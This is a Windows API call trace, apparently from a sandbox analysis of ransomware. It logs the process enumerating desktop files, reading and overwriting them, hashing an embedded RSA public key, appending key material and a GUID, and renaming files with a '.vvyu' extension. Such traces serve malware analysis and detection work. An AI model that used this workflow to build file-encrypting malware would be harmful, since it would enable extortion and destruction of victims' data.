hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e768 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d41458 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41668 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41880 [0183.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41668 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41880 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30e68 | out: hHeap=0x6a0000) returned 1 [0183.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41458 | out: hHeap=0x6a0000) returned 1 [0183.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.599] WriteFile (in: hFile=0x584, lpBuffer=0x2d36670*, nNumberOfBytesToWrite=0xadd5, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d36670*, lpNumberOfBytesWritten=0x30ffb14*=0xadd5, lpOverlapped=0x0) returned 1 [0183.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.600] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xadda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.600] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.602] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.602] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.602] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.602] CloseHandle (hObject=0x584) returned 1 [0183.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d36670 [0183.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.604] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\eOgdOPqhf.odp" (normalized: "c:\\users\\keecfmwgj\\desktop\\eogdopqhf.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\eOgdOPqhf.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\eogdopqhf.odp.vvyu")) returned 1 [0183.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.610] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.613] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0f4be40, ftCreationTime.dwHighDateTime=0x1d8a5b4, ftLastAccessTime.dwLowDateTime=0xfc85a00, ftLastAccessTime.dwHighDateTime=0x1d8a607, ftLastWriteTime.dwLowDateTime=0xfc85a00, ftLastWriteTime.dwHighDateTime=0x1d8a607, nFileSizeHigh=0x0, nFileSizeLow=0x528c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f kf.mkv", cAlternateFileName="FKF~1.MKV")) returned 1 [0183.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30e68 [0183.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0183.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30e68 | out: hHeap=0x6a0000) returned 1 [0183.613] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\f kf.mkv") returned=".mkv" [0183.613] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\f kf.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\f kf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.614] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=21132) returned 1 [0183.614] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.616] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5266, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.616] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.621] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.621] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x528c, lpOverlapped=0x0) returned 1 [0183.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.622] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.622] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.622] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.623] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.623] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.623] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.623] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.623] GetLastError () returned 0x0 [0183.623] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.623] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.623] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.623] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.624] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5290) returned 0x2d36670 [0183.624] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30e68 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30eb0 [0183.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.625] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d3f908 [0183.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f908 | out: hHeap=0x6a0000) returned 1 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e798 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e780 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.628] GetCurrentThreadId () returned 0x264 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce4a0 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.629] GetCurrentThreadId () returned 0x264 [0183.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.632] 